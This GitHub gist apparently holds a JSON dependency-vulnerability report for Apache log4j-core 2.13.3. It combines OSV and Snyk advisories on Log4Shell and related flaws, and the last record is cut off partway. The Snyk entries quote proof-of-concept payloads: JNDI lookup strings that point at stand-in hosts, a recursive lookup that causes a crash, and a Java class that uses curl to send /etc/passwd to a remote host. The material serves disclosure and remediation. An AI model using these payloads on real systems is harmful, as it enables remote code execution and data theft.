Skip to content

Instantly share code, notes, and snippets.

@bobmcwhirter

bobmcwhirter/gist:aa30a7393d601787f26d665fbd2ac2c3

Created September 28, 2023 19:21
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save bobmcwhirter/aa30a7393d601787f26d665fbd2ac2c3 to your computer and use it in GitHub Desktop.
Save bobmcwhirter/aa30a7393d601787f26d665fbd2ac2c3 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
gistfile1.txt
{
"affected": {
"pkg:maven/org.apache.logging.log4j/log4j-core@2.13.3": [
"ghsa-7rjr-3q55-vv33",
"ghsa-8489-44mv-ggj8",
"ghsa-jfh8-c2jp-5v3q",
"ghsa-p6xc-xr62-6r2g",
"cve-2021-44832",
"cwe-94",
"cve-2021-45105",
"cwe-400",
"cve-2021-45046",
"ghsa-7rjr-3q55-vv33",
"cve-2021-44228",
"ghsa-jfh8-c2jp-5v3q"
]
},
"vulnerabilities": [
{
"origin": "osv",
"id": "GHSA-8489-44mv-ggj8",
"modified": "2023-04-11T01:37:36.948945Z",
"published": "2022-01-04T16:14:20Z",
"withdrawn": null,
"summary": "Improper Input Validation and Injection in Apache Log4j2",
"details": "Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to an attack where an attacker with permission to modify the logging configuration file can construct a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI which can execute remote code. This issue is fixed by limiting JNDI data source names to the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2.\n\n\n# Affected packages\nOnly the `org.apache.logging.log4j:log4j-core` package is directly affected by this vulnerability. The `org.apache.logging.log4j:log4j-api` should be kept at the same version as the `org.apache.logging.log4j:log4j-core` package to ensure compatability if in use.\n\nThis issue does not impact default configurations of Log4j2 and requires an attacker to have control over the Log4j2 configuration, which reduces the likelihood of being exploited.",
"aliases": [
"CVE-2021-44832"
],
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44832"
},
{
"type": "PACKAGE",
"url": "https://github.com/apache/logging-log4j2"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2021/12/28/1"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-784507.pdf"
},
{
"type": "WEB",
"url": "https://issues.apache.org/jira/browse/LOG4J2-3293"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread/s1o5vlo78ypqxnzn6p8zf6t9shtq5143"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2021/12/msg00036.html"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EVV25FXL4FU5X6X5BSL7RLQ7T6F65MRA/"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/T57MPJUW3MA6QGWZRTMCHHMMPQNVKGFC/"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20220104-0001/"
},
{
"type": "WEB",
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpujan2022.html"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
}
]
},
{
"origin": "snyk",
"id": "CVE-2021-45046",
"modified": "1970-01-01T00:00:00Z",
"published": "1970-01-01T00:00:00Z",
"withdrawn": null,
"summary": "",
"details": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) if one of the following conditions is met:\r\n\r\n1. Logging configuration explicitly enables lookups – either by default (if using a version lower than 2.15.0) or manually by using `%m{lookups}` as `formatMsgNoLookups` is switched on by default as of version 2.15.0.\r\n2. Or uses a non-default Pattern Layout with Context Lookup where attackers can control input data via Thread Context Map (MDC),\r\n3. Or uses `Logger.printf(\"%s\", userInput)` function where attackers can control the userInput variable.\r\n\r\nA malicious actor is able to bypass the mitigation implemented in version 2.15.0 that limits JNDI lookups to localhost only: `${jndi:ldap://127.0.0.1#evilhost.com:1389/a}`.\r\n\r\nWe recommend updating to version 2.16.0 which completely disables JNDI lookups by default. If upgrading is not an option, this issue can be mitigated in prior releases by removing the `JndiLookup` class from the classpath (example: `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`).\r\n\r\n### PoC\r\n\r\nIn config:\r\n```\r\n<pattern>%d %p %c{1.} [%t] $${ctx:loginId} %m%n</pattern>\r\n```\r\n\r\nIn code:\r\n```java\r\nThreadContext.put(\"loginId\", UserControlledInput);\r\n```\r\n\r\n### History\r\n\r\nThis vulnerability was previously assigned a CVSS score of 3.7 (Low), and the impact was believed to be Denial of Service (DoS).\r\n\r\nFurthermore, the advisory previously mentioned Thread Context Map patterns (%X, %mdc, or %MDC) as being vulnerable to this issue, but that has since been proven wrong.\r\n\r\nOn December 17, 2021 new information came to light, demonstrating that an Arbitrary Code Execution vulnerability still exists in version 2.15.0 of Log4j due to a bypass to the localhost-only lookup mechanism.\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.2, 2.16.0 or higher.\n## References\n- [Apache Pony Mail](https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88f)\n- [Apache Security Page](https://logging.apache.org/log4j/2.x/security.html)\n- [Twitter Post](https://twitter.com/marcioalm/status/1471740771581652995)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-45046.yaml)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n",
"aliases": [
"SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2320014"
],
"severities": [
{
"type": "cvss3",
"source": "Snyk",
"score": 9,
"additional": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H/RL:O/RC:C"
}
],
"references": [
{
"type": "Apache Pony Mail",
"url": "https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88f"
},
{
"type": "Apache Security Page",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"type": "CISA - Known Exploited Vulnerabilities",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"type": "Nuclei Templates",
"url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-45046.yaml"
},
{
"type": "Twitter Post",
"url": "https://twitter.com/marcioalm/status/1471740771581652995"
}
]
},
{
"origin": "snyk",
"id": "CVE-2021-45105",
"modified": "1970-01-01T00:00:00Z",
"published": "1970-01-01T00:00:00Z",
"withdrawn": null,
"summary": "",
"details": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). Does not protect against uncontrolled recursion from self-referential lookups. \r\n\r\nWhen the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, `$${ctx:loginId}`), attackers with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup, resulting in a `StackOverflowError` that will terminate the process.\r\n\r\n### PoC\r\n\r\nIn `log4j.properties`:\r\n```java\r\nappender.console.type = Console\r\nappender.console.name = console\r\nappender.console.layout.type = PatternLayout\r\nappender.console.layout.pattern = !${ctx:test}! %m%n\r\nrootLogger.level = ALL\r\nrootLogger.appenderRef.file.ref = console\r\n```\r\n\r\nIn `Main.java`:\r\n```java\r\nThreadContext.put(\"test\", \"${::-${ctx:test}}\");\r\nlogger.error(\"boom\"); // Will not be logged\r\n```\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.3, 2.17.0 or higher.\n## References\n- [Apache Security](https://logging.apache.org/log4j/2.x/security.html)\n- [JIRA Issue](https://issues.apache.org/jira/browse/LOG4J2-3230)\n",
"aliases": [
"SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2321524"
],
"severities": [
{
"type": "cvss3",
"source": "Snyk",
"score": 7.5,
"additional": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P"
}
],
"references": [
{
"type": "Apache Security",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"type": "JIRA Issue",
"url": "https://issues.apache.org/jira/browse/LOG4J2-3230"
}
]
},
{
"origin": "osv",
"id": "GHSA-p6xc-xr62-6r2g",
"modified": "2023-04-11T01:41:26.660958Z",
"published": "2021-12-18T18:00:07Z",
"withdrawn": null,
"summary": "Apache Log4j2 vulnerable to Improper Input Validation and Uncontrolled Recursion",
"details": "Apache Log4j2 versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3) did not protect from uncontrolled recursion from self-referential lookups. This allows an attacker with control over Thread Context Map data to cause a denial of service when a crafted string is interpreted. This issue was fixed in Log4j 2.17.0 and 2.12.3.\n\n\n# Affected packages\nOnly the `org.apache.logging.log4j:log4j-core` package is directly affected by this vulnerability. The `org.apache.logging.log4j:log4j-api` should be kept at the same version as the `org.apache.logging.log4j:log4j-core` package to ensure compatability if in use.",
"aliases": [
"CVE-2021-45105"
],
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-45105"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2021/12/19/1"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-501673.pdf"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2021/12/msg00017.html"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EOKPQGV24RRBBI4TBZUDQMM4MEH7MXCY/"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SIG7FZULMNK2XF6FZRU4VWYDQXNMUGAJ/"
},
{
"type": "WEB",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"type": "WEB",
"url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20211218-0001/"
},
{
"type": "WEB",
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd"
},
{
"type": "WEB",
"url": "https://www.debian.org/security/2021/dsa-5024"
},
{
"type": "WEB",
"url": "https://www.kb.cert.org/vuls/id/930724"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpujan2022.html"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
},
{
"type": "WEB",
"url": "https://www.zerodayinitiative.com/advisories/ZDI-21-1541/"
}
]
},
{
"origin": "osv",
"id": "GHSA-7rjr-3q55-vv33",
"modified": "2023-06-27T20:14:56.111970Z",
"published": "2021-12-14T18:01:28Z",
"withdrawn": null,
"summary": "Incomplete fix for Apache Log4j vulnerability",
"details": "# Impact\n\nThe fix to address [CVE-2021-44228](https://nvd.nist.gov/vuln/detail/CVE-2021-44228) in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allow attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in a remote code execution (RCE) attack. \n\n## Affected packages\nOnly the `org.apache.logging.log4j:log4j-core` package is directly affected by this vulnerability. The `org.apache.logging.log4j:log4j-api` should be kept at the same version as the `org.apache.logging.log4j:log4j-core` package to ensure compatability if in use.\n\n# Mitigation\n\nLog4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default. This issue can be mitigated in prior releases (< 2.16.0) by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).\n\nLog4j 2.15.0 restricts JNDI LDAP lookups to localhost by default. Note that previous mitigations involving configuration such as to set the system property `log4j2.formatMsgNoLookups` to `true` do NOT mitigate this specific vulnerability.",
"aliases": [
"CVE-2021-45046"
],
"references": [
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-45046"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2021/12/14/4"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2021/12/15/3"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2021/12/18/1"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdf"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdf"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EOKPQGV24RRBBI4TBZUDQMM4MEH7MXCY/"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SIG7FZULMNK2XF6FZRU4VWYDQXNMUGAJ/"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EOKPQGV24RRBBI4TBZUDQMM4MEH7MXCY/"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SIG7FZULMNK2XF6FZRU4VWYDQXNMUGAJ/"
},
{
"type": "WEB",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"type": "WEB",
"url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032"
},
{
"type": "WEB",
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd"
},
{
"type": "WEB",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-44228"
},
{
"type": "WEB",
"url": "https://www.debian.org/security/2021/dsa-5022"
},
{
"type": "WEB",
"url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html"
},
{
"type": "WEB",
"url": "https://www.kb.cert.org/vuls/id/930724"
},
{
"type": "WEB",
"url": "https://www.openwall.com/lists/oss-security/2021/12/14/4"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/alert-cve-2021-44228.html"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpujan2022.html"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
}
]
},
{
"origin": "snyk",
"id": "GHSA-7rjr-3q55-vv33",
"modified": "1970-01-01T00:00:00Z",
"published": "1970-01-01T00:00:00Z",
"withdrawn": null,
"summary": "",
"details": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) if one of the following conditions is met:\r\n\r\n1. Logging configuration explicitly enables lookups – either by default (if using a version lower than 2.15.0) or manually by using `%m{lookups}` as `formatMsgNoLookups` is switched on by default as of version 2.15.0.\r\n2. Or uses a non-default Pattern Layout with Context Lookup where attackers can control input data via Thread Context Map (MDC),\r\n3. Or uses `Logger.printf(\"%s\", userInput)` function where attackers can control the userInput variable.\r\n\r\nA malicious actor is able to bypass the mitigation implemented in version 2.15.0 that limits JNDI lookups to localhost only: `${jndi:ldap://127.0.0.1#evilhost.com:1389/a}`.\r\n\r\nWe recommend updating to version 2.16.0 which completely disables JNDI lookups by default. If upgrading is not an option, this issue can be mitigated in prior releases by removing the `JndiLookup` class from the classpath (example: `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`).\r\n\r\n### PoC\r\n\r\nIn config:\r\n```\r\n<pattern>%d %p %c{1.} [%t] $${ctx:loginId} %m%n</pattern>\r\n```\r\n\r\nIn code:\r\n```java\r\nThreadContext.put(\"loginId\", UserControlledInput);\r\n```\r\n\r\n### History\r\n\r\nThis vulnerability was previously assigned a CVSS score of 3.7 (Low), and the impact was believed to be Denial of Service (DoS).\r\n\r\nFurthermore, the advisory previously mentioned Thread Context Map patterns (%X, %mdc, or %MDC) as being vulnerable to this issue, but that has since been proven wrong.\r\n\r\nOn December 17, 2021 new information came to light, demonstrating that an Arbitrary Code Execution vulnerability still exists in version 2.15.0 of Log4j due to a bypass to the localhost-only lookup mechanism.\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.2, 2.16.0 or higher.\n## References\n- [Apache Pony Mail](https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88f)\n- [Apache Security Page](https://logging.apache.org/log4j/2.x/security.html)\n- [Twitter Post](https://twitter.com/marcioalm/status/1471740771581652995)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-45046.yaml)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n",
"aliases": [
"SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2320014"
],
"severities": [
{
"type": "cvss3",
"source": "Snyk",
"score": 9,
"additional": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H/RL:O/RC:C"
}
],
"references": [
{
"type": "Apache Pony Mail",
"url": "https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88f"
},
{
"type": "Apache Security Page",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"type": "CISA - Known Exploited Vulnerabilities",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"type": "Nuclei Templates",
"url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-45046.yaml"
},
{
"type": "Twitter Post",
"url": "https://twitter.com/marcioalm/status/1471740771581652995"
}
]
},
{
"origin": "snyk",
"id": "CVE-2021-44832",
"modified": "1970-01-01T00:00:00Z",
"published": "1970-01-01T00:00:00Z",
"withdrawn": null,
"summary": "",
"details": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution. <br /> **Note:** Even though this vulnerability appears to be related to the [log4Shell vulnerability](https://security.snyk.io/vuln/SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720), this vulnerability requires an attacker to have access to modify configurations to be exploitable, which is rarely possible.\r\n\r\nAn attacker with access to modification of logging configuration is able to configure `JDBCAppender` with a data source referencing a JNDI URI - which can execute malicious code.\r\n\r\nIn the fixed versions, `JDBCAppender` is using `JndiManager` and disables JNDI lookups by default (via `log4j2.enableJndiJdbc=false`).\r\n\r\n## Alternative Remediation\r\nIf you have reason to believe your application may be vulnerable and upgrading is not an option, you can either:\r\n\r\n* Disable/remove `JDBCAppender`\r\n* If `JDBCAppender` is used, make sure that it is not configured to use any protocol other than Java\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.2, 2.12.4, 2.17.1 or higher.\n## References\n- [Apache Security Page](https://logging.apache.org/log4j/2.x/security.html)\n- [GitHub Commit](https://github.com/apache/logging-log4j2/commit/05db5f9527254632b59aed2a1d78a32c5ab74f16)\n- [Jira Issue](https://issues.apache.org/jira/browse/LOG4J2-3293)\n- [Openwall Mail](https://www.openwall.com/lists/oss-security/2021/12/28/1)\n",
"aliases": [
"SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339"
],
"severities": [
{
"type": "cvss3",
"source": "Snyk",
"score": 6.6,
"additional": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H/E:P"
}
],
"references": [
{
"type": "Apache Security Page",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"type": "GitHub Commit",
"url": "https://github.com/apache/logging-log4j2/commit/05db5f9527254632b59aed2a1d78a32c5ab74f16"
},
{
"type": "Jira Issue",
"url": "https://issues.apache.org/jira/browse/LOG4J2-3293"
},
{
"type": "Openwall Mail",
"url": "https://www.openwall.com/lists/oss-security/2021/12/28/1"
}
]
},
{
"origin": "snyk",
"id": "CVE-2021-44228",
"modified": "1970-01-01T00:00:00Z",
"published": "1970-01-01T00:00:00Z",
"withdrawn": null,
"summary": "",
"details": "## Overview\n\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE).\nApache Log4j2 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.\r\n\r\nFrom log4j 2.15.0, JNDI LDAP endpoints are restricted to localhost by default.\r\n\r\n\r\n## PoC\r\nWhen an application uses log4j to log user input, an attacker can exploit this vulnerability, by supplying a malicious string that the application logs - for example, `${jndi:ldap://someurl/Evil}`. This causes the application to execute a malicious class supplied by an attacker’s LDAP server (`someurl/Evil` in this example).\r\n\r\nFor example, the vulnerability can be used to inject this malicious class into an application:\r\n```java\r\npublic class Evil implements ObjectFactory {\r\n @Override\r\n public Object getObjectInstance (Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) throws Exception {\r\n Runtime.getRuntime().exec(\"curl -F 'file=@/etc/passw‍đ' https://someurl/upload\");\r\n return null;\r\n }\r\n}\r\n```\r\nThis causes the application to disclose the `etc/passwd` file on the system, and send it to a remote attacker.\r\n\r\n## Further Remediation Options\r\nIf upgrading the version is not possible, we strongly recommend to mitigate the vulnerability using one of these methods:\r\n\r\n* Remove `JndiLookup.class` from the class path (i.e: `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`. While not pertinent to log4shell, consider also removing `JndiManager`, `JMSAppender` and `SMTPAppender` if you are not using them, as there are unconfirmed reports they could be leveraged in similar attacks in the future.\r\n* Partial mitigation: disable lookups via system properties or environmental variables. If you use log4j >=2.10.0, you can set the system property `LOG4J_FORMAT_MSG_NO_LOOKUPS` or the environmental variable `Dlog4j2.formatMsgNoLookups` to `true`. (RCE is possible in some non-default Pattern Layout configurations that use a Context Lookup or a Thread Context Map pattern.)\r\n\r\n<br>Upgrading your JDK versions is not enough to mitigate this vulnerability in all circumstances, as it was proven that setting the `com.sun.jndi.ldap.object.trustURLCodebase` property to `false` is not enough.\r\n<br>For more remediation advice, please visit the [Log4j Remediation Cheat Sheet](https://snyk.io/blog/log4shell-remediation-cheat-sheet/) post.\r\n\r\n\r\n**Note**: `org.apache.logging.log4j:log4j-api` was originally deemed vulnerable, but Apache maintainers have since [clarified](https://issues.apache.org/jira/browse/LOG4J2-3201) that this only affects `org.apache.logging.log4j:log4j-core`.\n\n## Remediation\n\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.2, 2.15.0 or higher.\n\n\nUse [this guide](https://snyk.io/blog/find-fix-log4shell-quickly-snyk/) to scan your projects for the Log4Shell vulnerability.\n\n## References\n\n- [Apache Jira Issues](https://issues.apache.org/jira/browse/LOG4J2-3198)\n\n- [Apache Jira Issues](https://issues.apache.org/jira/browse/LOG4J2-3201)\n\n- [Apache Security Advisory](https://logging.apache.org/log4j/2.x/security.html)\n\n- [GitHub PR](https://github.com/apache/logging-log4j2/pull/608)\n\n- [PoC](https://github.com/Kirill89/log4shell-vulnerable-server)\n\n- [Snyk Blog and Vulnerability Breakdown](https://snyk.io/blog/log4j-rce-log4shell-vulnerability-cve-2021-4428/)\n\n- [Exploit DB](https://www.exploit-db.com/exploits/51183)\n\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-44228.yaml)\n",
"aliases": [
"SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720"
],
"severities": [
{
"type": "cvss3",
"source": "Snyk",
"score": 10,
"additional": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H"
}
],
"references": [
{
"type": "Apache Jira Issues",
"url": "https://issues.apache.org/jira/browse/LOG4J2-3198"
},
{
"type": "Apache Jira Issues",
"url": "https://issues.apache.org/jira/browse/LOG4J2-3201"
},
{
"type": "Apache Security Advisory",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"type": "CISA - Known Exploited Vulnerabilities",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"type": "Exploit DB",
"url": "https://www.exploit-db.com/exploits/51183"
},
{
"type": "GitHub PR",
"url": "https://github.com/apache/logging-log4j2/pull/608"
},
{
"type": "Nuclei Templates",
"url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-44228.yaml"
},
{
"type": "PoC",
"url": "https://github.com/Kirill89/log4shell-vulnerable-server"
},
{
"type": "Snyk Blog and Vulnerability Breakdown",
"url": "https://snyk.io/blog/log4j-rce-log4shell-vulnerability-cve-2021-4428/"
}
]
},
{
"origin": "snyk",
"id": "CWE-94",
"modified": "1970-01-01T00:00:00Z",
"published": "1970-01-01T00:00:00Z",
"withdrawn": null,
"summary": "",
"details": "## Overview\n\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE).\nApache Log4j2 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.\r\n\r\nFrom log4j 2.15.0, JNDI LDAP endpoints are restricted to localhost by default.\r\n\r\n\r\n## PoC\r\nWhen an application uses log4j to log user input, an attacker can exploit this vulnerability, by supplying a malicious string that the application logs - for example, `${jndi:ldap://someurl/Evil}`. This causes the application to execute a malicious class supplied by an attacker’s LDAP server (`someurl/Evil` in this example).\r\n\r\nFor example, the vulnerability can be used to inject this malicious class into an application:\r\n```java\r\npublic class Evil implements ObjectFactory {\r\n @Override\r\n public Object getObjectInstance (Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) throws Exception {\r\n Runtime.getRuntime().exec(\"curl -F 'file=@/etc/passw‍đ' https://someurl/upload\");\r\n return null;\r\n }\r\n}\r\n```\r\nThis causes the application to disclose the `etc/passwd` file on the system, and send it to a remote attacker.\r\n\r\n## Further Remediation Options\r\nIf upgrading the version is not possible, we strongly recommend to mitigate the vulnerability using one of these methods:\r\n\r\n* Remove `JndiLookup.class` from the class path (i.e: `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`. While not pertinent to log4shell, consider also removing `JndiManager`, `JMSAppender` and `SMTPAppender` if you are not using them, as there are unconfirmed reports they could be leveraged in similar attacks in the future.\r\n* Partial mitigation: disable lookups via system properties or environmental variables. If you use log4j >=2.10.0, you can set the system property `LOG4J_FORMAT_MSG_NO_LOOKUPS` or the environmental variable `Dlog4j2.formatMsgNoLookups` to `true`. (RCE is possible in some non-default Pattern Layout configurations that use a Context Lookup or a Thread Context Map pattern.)\r\n\r\n<br>Upgrading your JDK versions is not enough to mitigate this vulnerability in all circumstances, as it was proven that setting the `com.sun.jndi.ldap.object.trustURLCodebase` property to `false` is not enough.\r\n<br>For more remediation advice, please visit the [Log4j Remediation Cheat Sheet](https://snyk.io/blog/log4shell-remediation-cheat-sheet/) post.\r\n\r\n\r\n**Note**: `org.apache.logging.log4j:log4j-api` was originally deemed vulnerable, but Apache maintainers have since [clarified](https://issues.apache.org/jira/browse/LOG4J2-3201) that this only affects `org.apache.logging.log4j:log4j-core`.\n\n## Remediation\n\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.2, 2.15.0 or higher.\n\n\nUse [this guide](https://snyk.io/blog/find-fix-log4shell-quickly-snyk/) to scan your projects for the Log4Shell vulnerability.\n\n## References\n\n- [Apache Jira Issues](https://issues.apache.org/jira/browse/LOG4J2-3198)\n\n- [Apache Jira 